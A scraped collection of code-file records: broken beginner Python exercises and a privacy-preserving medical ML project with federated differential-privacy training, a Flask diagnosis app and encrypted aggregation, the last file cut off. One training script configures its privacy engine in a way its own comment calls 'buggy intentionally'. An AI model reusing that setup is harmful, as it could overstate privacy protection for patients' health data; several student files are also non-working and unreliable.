"text": "'''\nWrite a function to tokenize a given string and return a dictionary with the frequency of\neach word\n'''\n\nimport re\ndef tokenize(string):\n dict1 = {}\n for x in dictionary:\n dict1[x] = dict1.get(x,0) + 1\n return dict1\n\ndef main():\n lines = int(input())\n dictionary = input().split\n print(tokenize(string))\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.46875,
"alphanum_fraction": 0.53125,
"avg_line_length": 10.800000190734863,
"blob_id": "178625877bbae1dae29d6e34f78a410676db5ae5",
"content_id": "017ec17b60e09ed608e8d461b724df5f1f4bd54c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 64,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 5,
"path": "/CSPP1/M3/iterate_even_reverse1.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "print(\"print Hello!\")\nn=10\nwhile n>0:\n print(n)\n n=n-2\n \n\n"
},
{
"alpha_fraction": 0.5441176295280457,
"alphanum_fraction": 0.6029411554336548,
"avg_line_length": 21.33333396911621,
"blob_id": "e2ccfbaf83592a476e1068af7c00e237514f474f",
"content_id": "50eb6ab38ab6e47f229af52db5d2dfe98c03d0a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 68,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 3,
"path": "/CSPP1/M3/iterate_even_reverse.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "print(\"print Hello!\")\nfor n in range(10,0,-2):\n print(\"print\",n)\n\n"
},
{
"alpha_fraction": 0.5673469305038452,
"alphanum_fraction": 0.5755102038383484,
"avg_line_length": 24.789474487304688,
"blob_id": "ec42b1eb03f0d2c22fc6b84a70d979acde0d1931",
"content_id": "ddbae9d7d8dfb7dfe39935fc36d97eeef36bfea3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 490,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 19,
"path": "/CSPP1/M4/p2/bob_counter.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''Assume s is a string of lower case characters.\nWrite a program that prints the number of times the string 'bob'\noccurs in s. For example, if s = 'azcbobobegghakl', then your\nprogram should print\n\nNumber of times bob occurs is: 2'''\n\ndef main():\n \"\"\"defining main Subset \"\"\"\n v_a = input()\n #input string S\n v_b = 'bob'\n c_o = 0\n for i in range(len(v_a)):\n if v_b == v_a[i:i+3]:\n c_o = c_o + 1\n print(str(c_o))\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.48302870988845825,
"alphanum_fraction": 0.4934725761413574,
"avg_line_length": 21.58823585510254,
"blob_id": "854b9531266f39518477ea97ec10e8e015be1a13",
"content_id": "4a45ff8f867bcbb63aaf14f6e99ad0f0af4b4d9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 383,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 17,
"path": "/CSPP1/M15/Inheritance-Exercise on genPrimes/gen_primes.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "def genPrimes():\n number = 2\n prime = True\n while True:\n if prime == True:\n yield number\n number = number + 1\n for i in range(2,number):\n if number % i == 0:\n prime = False\n break\n else:\n prime = True\nn = int(input())\nprimenumber = genPrimes()\nfor i in range(n):\n print(primenumber.__next__())"
},
{
"alpha_fraction": 0.47278910875320435,
"alphanum_fraction": 0.5102040767669678,
"avg_line_length": 18.600000381469727,
"blob_id": "a16ae8a9c0d6c434e69ad45bd951024fa07d1392",
"content_id": "7221e6ebefb9efd689cebf504d04fe22662430a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 294,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 15,
"path": "/CSPP1/New folder/m5a5.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\"Test case\"\"\"\ndef main():\n\tx = 25\n\tepsilon = 0.01\n\tstep = 0.1\n\tguess = 0.0\n\twhile guess <= x:\n\t\tif abs(guess**2 -x) >= epsilon:\n\t\t\tguess += step\n if abs(guess**2 - x) >= epsilon:\n \tprint('failed')\n else:\n print('succeeded: ' + str(guess))\nif__name__ == \"__main__\":\n main()\n"
}
] | 29 |
BridgeYao2022/private-ml-for-health
|
https://github.com/BridgeYao2022/private-ml-for-health
|
413a50bb496cbdaa93c15bf9648be2c4e24b2a23
|
c77181d0628b3a04c411a01f7e402fccb4d34e09
|
92f7590bb74d17726b23296fb113a1c954005f5c
|
refs/heads/main
| 2023-07-29T14:10:11.652455 | 2021-09-13T18:02:36 | 2021-09-13T18:02:36 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4322616159915924,
"alphanum_fraction": 0.5141522288322449,
"avg_line_length": 37.712764739990234,
"blob_id": "bbdd039aeb7cfc148c593090b888c2bb4c63f91a",
"content_id": "8de9f6a72a170e92edf7aa9dbec9006d57a30aa6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3639,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 94,
"path": "/private_training/src_secure_aggregation/models.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "from torch import nn\nimport torch.nn.functional as F\n\nclass CNNMnist(nn.Module):\n def __init__(self, args):\n super(CNNMnist, self).__init__()\n self.conv1 = nn.Conv2d(args.num_channels, 16, 8, 2, padding=3)\n self.conv2 = nn.Conv2d(16, 32, 4, 2)\n self.fc1 = nn.Linear(32 * 4 * 4, 32)\n self.fc2 = nn.Linear(32, args.num_classes)\n\n def forward(self, x):\n # x of shape [B, 1, 28, 28]\n x = F.relu(self.conv1(x)) # -> [B, 16, 14, 14]\n x = F.max_pool2d(x, 2, 1) # -> [B, 16, 13, 13]\n x = F.relu(self.conv2(x)) # -> [B, 32, 5, 5]\n x = F.max_pool2d(x, 2, 1) # -> [B, 32, 4, 4]\n x = x.view(-1, 32 * 4 * 4) # -> [B, 512]\n x = F.relu(self.fc1(x)) # -> [B, 32]\n x = self.fc2(x) # -> [B, 10]\n return x\n\n\nclass CNNFashion_Mnist(nn.Module):\n def __init__(self, args):\n super(CNNFashion_Mnist, self).__init__()\n self.conv1 = nn.Conv2d(args.num_channels, 16, 8, 2, padding=3)\n self.conv2 = nn.Conv2d(16, 32, 4, 2)\n self.fc1 = nn.Linear(32 * 4 * 4, 32)\n self.fc2 = nn.Linear(32, args.num_classes)\n\n def forward(self, x):\n # x of shape [B, 1, 28, 28]\n x = F.relu(self.conv1(x)) # -> [B, 16, 14, 14]\n x = F.max_pool2d(x, 2, 1) # -> [B, 16, 13, 13]\n x = F.relu(self.conv2(x)) # -> [B, 32, 5, 5]\n x = F.max_pool2d(x, 2, 1) # -> [B, 32, 4, 4]\n x = x.view(-1, 32 * 4 * 4) # -> [B, 512]\n x = F.relu(self.fc1(x)) # -> [B, 32]\n x = self.fc2(x) # -> [B, 10]\n return x\n\nclass CNNCifar(nn.Module):\n def __init__(self, args):\n super(CNNCifar, self).__init__()\n self.conv1 = nn.Conv2d(3, 6, 5)\n self.pool = nn.MaxPool2d(2, 2)\n self.conv2 = nn.Conv2d(6, 16, 5)\n self.fc1 = nn.Linear(16 * 5 * 5, 120)\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, args.num_classes)\n\n def forward(self, x):\n x = self.pool(F.relu(self.conv1(x)))\n x = self.pool(F.relu(self.conv2(x)))\n x = x.view(-1, 16 * 5 * 5)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return F.log_softmax(x, dim=1)\n\n# class modelC(nn.Module):\n# def __init__(self, input_size, **kwargs):\n# super(modelC, self).__init__()\n# self.conv1 = nn.Conv2d(input_size, 96, 3, padding=1)\n# self.conv2 = nn.Conv2d(96, 96, 3, padding=1)\n# self.conv3 = nn.Conv2d(96, 96, 3, padding=1, stride=2)\n# self.conv4 = nn.Conv2d(96, 192, 3, padding=1)\n# self.conv5 = nn.Conv2d(192, 192, 3, padding=1)\n# self.conv6 = nn.Conv2d(192, 192, 3, padding=1, stride=2)\n# self.conv7 = nn.Conv2d(192, 192, 3, padding=1)\n# self.conv8 = nn.Conv2d(192, 192, 1)\n\n# self.class_conv = nn.Conv2d(192, args.num_classes, 1)\n\n\n# def forward(self, x):\n# x_drop = F.dropout(x, .2)\n# conv1_out = F.relu(self.conv1(x_drop))\n# conv2_out = F.relu(self.conv2(conv1_out))\n# conv3_out = F.relu(self.conv3(conv2_out))\n# conv3_out_drop = F.dropout(conv3_out, .5)\n# conv4_out = F.relu(self.conv4(conv3_out_drop))\n# conv5_out = F.relu(self.conv5(conv4_out))\n# conv6_out = F.relu(self.conv6(conv5_out))\n# conv6_out_drop = F.dropout(conv6_out, .5)\n# conv7_out = F.relu(self.conv7(conv6_out_drop))\n# conv8_out = F.relu(self.conv8(conv7_out))\n\n# class_out = F.relu(self.class_conv(conv8_out))\n# pool_out = F.adaptive_avg_pool2d(class_out, 1)\n# pool_out.squeeze_(-1)\n# pool_out.squeeze_(-1)\n# return pool_out\n"
},
{
"alpha_fraction": 0.6797698736190796,
"alphanum_fraction": 0.6836050152778625,
"avg_line_length": 29.676469802856445,
"blob_id": "61d01ecbf4a3c31f420508b10ca758e10a392947",
"content_id": "68ea99065440e92d51c00bae7afd9e96cc501d29",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1043,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 34,
"path": "/private_inference/app/app.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import os\nimport matplotlib.image as mpimg\nfrom flask import Flask, render_template, request, redirect\nfrom PIL import Image\nimport io\nfrom inference import get_prediction\nfrom commons import format_class_name, transform_image\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms, models\nimport pickle\nimport time\nimport json\n\napp = Flask(__name__)\[email protected]('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n if 'file' not in request.files:\n return redirect(request.url)\n file = request.files.get('file')\n if not file:\n return\n img_bytes = file.read()\n file_tensor = transform_image(image_bytes=img_bytes) #######\n class_name = get_prediction(file_tensor)\n return render_template('result.html', class_name=class_name)\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run(debug=True, port=int(os.environ.get('PORT', 5000)))\n"
},
{
"alpha_fraction": 0.5414749383926392,
"alphanum_fraction": 0.5519915819168091,
"avg_line_length": 38.010257720947266,
"blob_id": "318c78b96dd085798fad927c8c230492b00186eb",
"content_id": "c95109a72361a259c2d718356f13a4b87a2e69d9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7607,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 195,
"path": "/private_training/src/federated_main_s4.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import os\nimport copy\nimport time\nimport pickle\nimport numpy as np\nimport torch\nfrom torch import nn\n\nfrom torchsummary import summary\n\nfrom options import args_parser\nfrom update_s4 import LocalUpdate\nfrom utils import test_inference\nfrom models import CNNMnistRelu, CNNMnistTanh\nfrom models import CNNFashion_MnistRelu, CNNFashion_MnistTanh\nfrom models import CNNCifar10Relu, CNNCifar10Tanh\nfrom utils import average_weights, exp_details\nfrom datasets import get_dataset\nfrom torchvision import models\nfrom logging_results import logging\n\nfrom opacus.dp_model_inspector import DPModelInspector\nfrom opacus.utils import module_modification\nfrom opacus import PrivacyEngine\n\n\nif __name__ == '__main__':\n \n ############# Common ###################\n args = args_parser() \n if args.gpu:\n torch.cuda.set_device(args.gpu)\n device = 'cuda' if args.gpu else 'cpu' \n \n # load dataset and user groups\n train_dataset, test_dataset, user_groups = get_dataset(args)\n\n \n # BUILD MODEL\n if args.model == 'cnn':\n # Convolutional neural netork\n if args.dataset == 'mnist':\n if args.activation == 'relu':\n global_model = CNNMnistRelu()\n elif args.activation == 'tanh':\n global_model = CNNMnistTanh()\n global_model.to(device)\n summary(global_model, input_size=(1, 28, 28), device=device)\n elif args.dataset == 'fmnist':\n if args.activation == 'relu':\n global_model = CNNFashion_MnistRelu()\n elif args.activation == 'tanh':\n global_model = CNNFashion_MnistTanh()\n global_model.to(device)\n summary(global_model, input_size=(1, 28, 28), device=device)\n elif args.dataset == 'cifar10':\n # global_model = models.resnet18(num_classes=10) \n if args.activation == 'relu':\n global_model = CNNCifar10Relu()\n elif args.activation == 'tanh':\n global_model = CNNCifar10Tanh()\n global_model.to(device)\n summary(global_model, input_size=(3, 32, 32), device=device)\n elif args.dataset == 'dr': \n global_model = models.squeezenet1_1(pretrained=True) \n global_model.classifier[1] = nn.Conv2d(512, 5, kernel_size=(1,1), stride=(1,1))\n global_model.num_classes = 5\n global_model.to(device)\n summary(global_model, input_size=(3, 224, 224), device=device)\n else:\n exit('Error: unrecognized model')\n ############# Common ###################\n\n ######### DP Model Compatibility #######\n if args.withDP:\n try:\n inspector = DPModelInspector()\n inspector.validate(global_model)\n print(\"Model's already Valid!\\n\")\n except:\n global_model = module_modification.convert_batchnorm_modules(global_model)\n inspector = DPModelInspector()\n print(f\"Is the model valid? {inspector.validate(global_model)}\")\n print(\"Model is convereted to be Valid!\\n\") \n ######### DP Model Compatibility #######\n\n \n\n ######### Local Models and Optimizers #############\n local_models = []\n local_optimizers = []\n local_privacy_engine = []\n\n for u in range(args.num_users):\n local_models.append(copy.deepcopy(global_model))\n\n if args.optimizer == 'sgd':\n optimizer = torch.optim.SGD(local_models[u].parameters(), lr=args.lr, \n momentum=args.momentum) \n elif args.optimizer == 'adam':\n optimizer = torch.optim.Adam(local_models[u].parameters(), lr=args.lr) \n\n if args.withDP:\n # This part is buggy intentionally. It makes privacy engine avoid giving error with vhp.\n \n privacy_engine = PrivacyEngine(\n local_models[u],\n batch_size = int(len(train_dataset)*args.sampling_prob), \n sample_size = len(train_dataset), \n alphas=[1 + x / 10.0 for x in range(1, 100)] + list(range(12, 64)),\n noise_multiplier = args.noise_multiplier/np.sqrt(args.num_users),\n max_grad_norm = args.max_grad_norm,\n )\n\n privacy_engine.attach(optimizer) \n local_privacy_engine.append(privacy_engine)\n\n local_optimizers.append(optimizer)\n\n\n if args.optimizer == 'sgd':\n g_optimizer = torch.optim.SGD(global_model.parameters(), lr=args.lr, \n momentum=args.momentum) \n elif args.optimizer == 'adam':\n g_optimizer = torch.optim.Adam(global_model.parameters(), lr=args.lr) \n if args.withDP:\n local_dataset_size = int(len(train_dataset)/args.num_users)\n actual_train_ds_size = local_dataset_size*args.num_users\n global_privacy_engine = PrivacyEngine(\n global_model,\n batch_size = int(actual_train_ds_size*args.sampling_prob),\n sample_size = actual_train_ds_size,\n alphas=[1 + x / 10.0 for x in range(1, 100)] + list(range(12, 64)),\n noise_multiplier = args.noise_multiplier,\n max_grad_norm = args.max_grad_norm) \n global_privacy_engine.attach(g_optimizer)\n ######## Local Models and Optimizers #############\n\n # Training\n train_loss = []\n test_log = []\n epsilon_log = []\n \n print(\"Avg batch_size: \", int(actual_train_ds_size*args.sampling_prob))\n\n for epoch in range(args.epochs): \n ## Sample the users ## \n idxs_users = np.random.choice(range(args.num_users),\n max(int(args.frac * args.num_users), 1),\n replace=False)\n #####\n local_weights, local_losses = [], [] \n \n\n for u in idxs_users:\n \n torch.cuda.empty_cache()\n\n local_model = LocalUpdate(args=args, dataset=train_dataset, \n u_id=u, idxs=user_groups[u], \n sampling_prob=args.sampling_prob,\n optimizer = local_optimizers[u])\n\n w, loss, local_optimizers[u] = local_model.update_weights(\n model=local_models[u],\n global_round=epoch)\n local_weights.append(copy.deepcopy(w))\n local_losses.append(copy.deepcopy(loss))\n \n\n # update global weights\n global_weights = average_weights(local_weights)\n\n # update global weights\n global_model.load_state_dict(global_weights)\n for u in range(args.num_users):\n local_models[u].load_state_dict(global_weights)\n\n if epoch !=0 and epoch%30==0:\n torch.cuda.empty_cache() \n loss_avg = sum(local_losses) / len(local_losses) \n train_loss.append(loss_avg)\n\n _acc, _loss = test_inference(args, global_model, test_dataset) \n test_log.append([_acc, _loss]) \n \n if args.withDP:\n global_privacy_engine.steps = epoch+1\n epsilons, _ = global_privacy_engine.get_privacy_spent(args.delta) \n epsilon_log.append([epsilons])\n else:\n epsilon_log = None\n\n logging(args, epoch, train_loss, test_log, epsilon_log)\n print(global_privacy_engine.steps)\n"
},
{
"alpha_fraction": 0.7933723330497742,
"alphanum_fraction": 0.7933723330497742,
"avg_line_length": 67.4000015258789,
"blob_id": "f6e3da41c1a9fd0641ae496c4cc0e9f993f9269c",
"content_id": "bdc8d8a519f6d594c298922f67eadec2b64723f5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1026,
"license_type": "permissive",
"max_line_length": 391,
"num_lines": 15,
"path": "/private_inference/ReadME.md",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "# Private Inference\n\nThis section contains the source code for a Proof-of-Concept demo app that patients can use to get their diagnosis, provided they possess a digital copy of their scan. Images from the diabetic retinopathy dataset can be uploaded to this app, and a diagnosis is returned within seconds, reducing the resources that hospitals would spend diagnosing patients who are not at risk of vision loss.\n\n## Deployed App Demo\n\nThe demo app has been deployed on heroku on the followinng link: https://imperial-diagnostics.herokuapp.com.\n\n## App Source Code\n\nThe folder `app/` contains code for a demo app that patients can use to get their diagnosis, provided they possess a digital copy of their scan.\n\nThe app can launched locally by downloading the folder and running `python app.py`. The app will accept any image from the diabetic retinopathy dataset as input (a few example inputs are provided in the folder) and will produce an output, as per the demo video below:\n\n\n"
},
{
"alpha_fraction": 0.5059511065483093,
"alphanum_fraction": 0.5115776062011719,
"avg_line_length": 39.543861389160156,
"blob_id": "674a91491871c5707ddf2a3f897380ccdc80f624",
"content_id": "d334a51fd805266e79ef828ea904c3db5e0c41aa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4621,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 114,
"path": "/private_training/src/update_s3.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Python version: 3.6\n\nimport torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader, Dataset\nimport numpy as np\nfrom opacus import PrivacyEngine\n\n\nclass DatasetSplit(Dataset):\n \"\"\"An abstract Dataset class wrapped around Pytorch Dataset class.\n \"\"\"\n\n def __init__(self, dataset, idxs):\n self.dataset = dataset\n self.idxs = [int(i) for i in idxs]\n\n def __len__(self):\n return len(self.idxs)\n\n def __getitem__(self, item):\n image, label = self.dataset[self.idxs[item]]\n return image.clone().detach(), torch.tensor(label)\n\n\nclass LocalUpdate(object):\n def __init__(self, args, dataset, u_id, idxs):\n self.u_id = u_id\n self.args = args\n self.trainloader, self.testloader = self.train_val_test(\n dataset, list(idxs))\n self.device = 'cuda' if args.gpu else 'cpu'\n self.criterion = nn.CrossEntropyLoss().to(self.device)\n self.dataset_size = len(idxs)\n\n def train_val_test(self, dataset, idxs):\n \"\"\"\n Returns train and test dataloaders for a given dataset\n and user indexes.\n \"\"\"\n _split = 0\n if self.args.local_test_split > 0.0:\n _split = max(int(np.round((self.args.local_test_split)*len(idxs))), 1)\n \n idxs_train = idxs[_split:] \n trainloader = DataLoader(DatasetSplit(dataset, idxs_train),\n batch_size=self.args.local_bs,\n shuffle=True, drop_last=True) \n testloader = None\n if _split > 0:\n idxs_test = idxs[:_split]\n testloader = DataLoader(DatasetSplit(dataset, idxs_test),\n batch_size=int(len(idxs_test)), shuffle=False)\n return trainloader, testloader\n ###########\n\n \n def update_weights(self, model, global_round, u_step=0):\n # Set mode to train model\n model.train()\n epoch_loss = []\n \n if self.args.optimizer == 'sgd':\n optimizer = torch.optim.SGD(model.parameters(), lr=self.args.lr, \n momentum=self.args.momentum) \n elif self.args.optimizer == 'adam':\n optimizer = torch.optim.Adam(model.parameters(), lr=self.args.lr) \n\n if self.args.withDP:\n privacy_engine = PrivacyEngine(\n model,\n batch_size = self.args.virtual_batch_size,\n sample_size = self.dataset_size,\n alphas=[1 + x / 10.0 for x in range(1, 100)] + list(range(12, 64)),\n noise_multiplier = self.args.noise_multiplier,\n max_grad_norm = self.args.max_grad_norm,\n )\n \n privacy_engine.attach(optimizer) \n privacy_engine.steps = u_step\n\n for iter in range(self.args.local_ep): \n batch_loss = []\n optimizer.zero_grad()\n if self.args.withDP:\n virtual_batch_rate = int(self.args.virtual_batch_size / self.args.local_bs) \n for batch_idx, (images, labels) in enumerate(self.trainloader): \n images, labels = images.to(self.device), labels.to(self.device)\n model_preds = model(images)\n loss = self.criterion(model_preds, labels)\n loss.backward()\n \n if self.args.withDP:\n # take a real optimizer step after N_VIRTUAL_STEP steps t \n if ((batch_idx + 1) % virtual_batch_rate == 0) or ((batch_idx + 1) == len(self.trainloader)):\n optimizer.step()\n optimizer.zero_grad() \n else: \n optimizer.virtual_step() # take a virtual step \n else:\n optimizer.step()\n optimizer.zero_grad()\n #############\n batch_loss.append(loss.item())\n \n epoch_loss.append(sum(batch_loss)/len(batch_loss))\n\n if self.args.withDP: \n epsilon, best_alpha = optimizer.privacy_engine.get_privacy_spent(self.args.delta) \n return model.state_dict(), sum(epoch_loss) / len(epoch_loss), optimizer.privacy_engine.steps, epsilon \n \n return model.state_dict(), sum(epoch_loss) / len(epoch_loss), 0., 0."
},
{
"alpha_fraction": 0.745843231678009,
"alphanum_fraction": 0.7727632522583008,
"avg_line_length": 28.325580596923828,
"blob_id": "ee2a3338a3d8c3f79f3dc8533e8001518e820151",
"content_id": "28bafeb447c738df5dac65c4eb3c9da01371b8be",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1263,
"license_type": "permissive",
"max_line_length": 234,
"num_lines": 43,
"path": "/private_training/build_pyseal.sh",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\n#\n# Script to build Linux SEAL libraries, python wrapper, and examples\n#\n\n# Install binary dependencies\nsudo apt-get -qqy update && apt-get install -qqy g++ git make python3 python3-dev\npython3-pip libdpkg-perl\n\ncd ~/\ngit clone https://github.com/Lab41/PySEAL.git\n\n# Build SEAL libraries\ncd ~/PySEAL/SEAL/\nchmod +x configure\nsed -i -e 's/\\r$//' configure\n./configure\nmake\nexport LD_LIBRARY_PATH=~/PySEAL/SEAL/bin:$LD_LIBRARY_PATH\n\n# Build SEAL C++ example\ncd ~/PySEAL/SEALExamples\nmake\n\n# Build SEAL Python wrapper\n\ncd ~/PySEAL/SEALPython\npip3 install --upgrade pip\npip3 install setuptools\npip3 install -r requirements.txt\ngit clone https://github.com/pybind/pybind11.git\ncd ~/PySEAL/SEALPython/pybind11\ngit checkout a303c6fc479662fd53eaa8990dbc65b7de9b7deb\ncd ~/PySEAL/SEALPython\npython3 setup.py build_ext -i\nexport PYTHONPATH=$PYTHONPATH:~/PySEAL/SEALPython:~/PySEAL/bin\n\n# add the following line to your .bashrc file in the home directory\n\n# export PYTHONPATH=$PYTHONPATH:~/PySEAL/SEALPython:~/PySEAL/bin\n\n# This will allow your python interpreter in the bash terminal to recognize the location of the library everytime you login. Add this path instead to the library paths for your python interpreter in pycharm to make it work in pycharm.\n\n\n"
},
{
"alpha_fraction": 0.6129667162895203,
"alphanum_fraction": 0.6213346719741821,
"avg_line_length": 43.85173416137695,
"blob_id": "e42290164a01105f964ee31f906fd5f862a3e9d0",
"content_id": "52e1556cb81547e855ba2c20fd1f7105392a02f3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14221,
"license_type": "permissive",
"max_line_length": 150,
"num_lines": 317,
"path": "/private_training/src_secure_aggregation/FLDP_secure_aggregation.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Python version: 3.6\n\n\nimport os\nimport copy\nimport time\nimport pickle\nimport numpy as np\n\nimport torch\nfrom tensorboardX import SummaryWriter\n\nfrom options import args_parser\nfrom update import LocalUpdate\nfrom utils import test_inference\nfrom models import CNNMnist, CNNFashion_Mnist, CNNCifar\nfrom utils import average_weights, exp_details\nfrom datasets_secure import get_train_dataset, get_test_dataset\n\nfrom opacus.dp_model_inspector import DPModelInspector\nfrom opacus.utils import module_modification\nfrom mpi4py import MPI\nimport random\nimport seal\nfrom seal import ChooserEvaluator, \\\n\tCiphertext, \\\n\tDecryptor, \\\n\tEncryptor, \\\n\tEncryptionParameters, \\\n\tEvaluator, \\\n\tIntegerEncoder, \\\n\tFractionalEncoder, \\\n\tKeyGenerator, \\\n\tMemoryPoolHandle, \\\n\tPlaintext, \\\n\tSEALContext, \\\n\tEvaluationKeys, \\\n\tGaloisKeys, \\\n\tPolyCRTBuilder, \\\n\tChooserEncoder, \\\n\tChooserEvaluator, \\\n\tChooserPoly\n\nfrom itertools import islice, chain, repeat\ndef chunk_pad(it, size, padval=None):\n it = chain(iter(it), repeat(padval))\n return iter(lambda: tuple(islice(it, size)), (padval,) * size)\n\ndef send_enc():\n list_params = []\n for param_tensor in model.state_dict():\n list_params += model.state_dict()[param_tensor].flatten().tolist()\n length = len(list_params)\n list_params_int = [0]*length\n for h in range(length):\n # Convert float values to integer so that they can be encrypted\n # length_integer is the maximum number of digits in the integer representation.\n # The returned value min_prec is the min number of dec places before first non-zero digit in float value.\n list_params_int[h] = round(list_params[h],3)*1000\n #length_integer = 3\n #list_params_int[h], min_prec = conv_int(list_params[h], length_integer)\n slot_count = int(crtbuilder.slot_count())\n pod_iter = iter(list_params_int)\n pod_sliced = list(chunk_pad(pod_iter, slot_count, 0)) # partitions the vector pod_vec into chunks of size equal to the number of batching slots\n for h in range(len(pod_sliced)):\n pod_sliced[h] = [int(pod_sliced[h][j]) for j in range(len(pod_sliced[h]))]\n for j in range(len(pod_sliced[h])):\n if pod_sliced[h][j] < 0:\n pod_sliced[h][j] = parms.plain_modulus().value() + pod_sliced[h][j]\n comm.send(len(pod_sliced), dest = 0, tag = 1)\n for chunk in range(len(pod_sliced)):\n encrypted_vec = Ciphertext()\n plain_vector = Plaintext()\n crtbuilder.compose(list(pod_sliced[chunk]), plain_vector)\n encryptor.encrypt(plain_vector, encrypted_vec)\n comm.send(encrypted_vec, dest = 0, tag=chunk+2)\n\n\ndef recv_enc(idx_local):\n num_chunks = comm.recv(source=idx_local, tag=1) # receive the number of chunks to be sent by the worker\n list_params_enc = []\n for chunk in range(num_chunks):\n list_params_enc += [comm.recv(source = idx_local, tag=chunk+2)]\n return list_params_enc\n\ndef average_weights_enc():\n list_sums = []\n for j in range(len(local_weights[0])):\n enc_sum = Ciphertext()\n list_columns = [local_weights[h][j] for h in range(len(local_weights))] # length of list_columns is equal to the number of active workers\n evaluator.add_many(list_columns,enc_sum)\n list_sums.append(enc_sum)\n return list_sums # element-wise sum of encrypted weight vectors received from active workers\n\ndef dec_recompose(enc_wts): # function to decrypt the aggregated weight vector received from parameter server\n dec_wts = []\n global_aggregate = {}\n chunks = len(enc_wts)\n for h in range(chunks):\n plain_agg = Plaintext()\n decryptor.decrypt(enc_wts[h], plain_agg)\n crtbuilder.decompose(plain_agg)\n dec_wts += [plain_agg.coeff_at(h) for h in range(plain_agg.coeff_count())]\n for h in range(len(dec_wts)):\n if dec_wts[h] > int(parms.plain_modulus().value() - 1) / 2:\n dec_wts[h] = dec_wts[h] - parms.plain_modulus().value()\n for h in range(len(dec_wts)):\n dec_wts[h] = float(dec_wts[h])/(1000*m)\n pos_start=0\n for param_tensor in flattened_lengths:\n pos_end = pos_start + flattened_lengths[param_tensor]\n global_aggregate.update({param_tensor:torch.tensor(dec_wts[pos_start:pos_end]).reshape(shapes[param_tensor])})\n pos_start=pos_end\n return global_aggregate\n\n\nif __name__ == '__main__':\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n nworkers = comm.Get_size()-1\n workers = list(range(1,nworkers+1))\n start_time = time.time()\n print(\"Ids of workers: \", str(workers))\n print(\"Number of workers: \", str(nworkers))\n ## Generate encryption parameters at worker 1 and share them with all workers.\n # Share context object with the parameter server, so that it can aggregate encrypted values.\n if rank==1:\n # Initialize the parameters used for FHE\n parms = EncryptionParameters()\n parms.set_poly_modulus(\"1x^4096 + 1\")\n parms.set_coeff_modulus(seal.coeff_modulus_128(4096)) # 128-bit security\n parms.set_plain_modulus(40961)\n context = SEALContext(parms)\n comm.send(context, dest=0, tag=0) # send the context to the parameter server\n print(\"Sent context to server\")\n for i in workers[1:]:\n print(\"Sent context to worker \", str(i))\n comm.send(context, dest=i, tag=0) # send the context to the other workers\n\n keygen = KeyGenerator(context)\n public_key = keygen.public_key()\n secret_key = keygen.secret_key()\n for i in workers[1:]:\n print(\"Sending keys to worker \", str(i))\n comm.send(public_key, dest=i, tag=1) # send the public key to worker i\n comm.send(secret_key, dest=i, tag=2) # send the secret key to worker i\n\n encryptor = Encryptor(context, public_key)\n decryptor = Decryptor(context, secret_key)\n # Batching is done through an instance of the PolyCRTBuilder class so need\n # to start by constructing one.\n crtbuilder = PolyCRTBuilder(context)\n\n elif rank==0: # Parameter server\n context = comm.recv(source=1, tag=0) # parameter server receives only 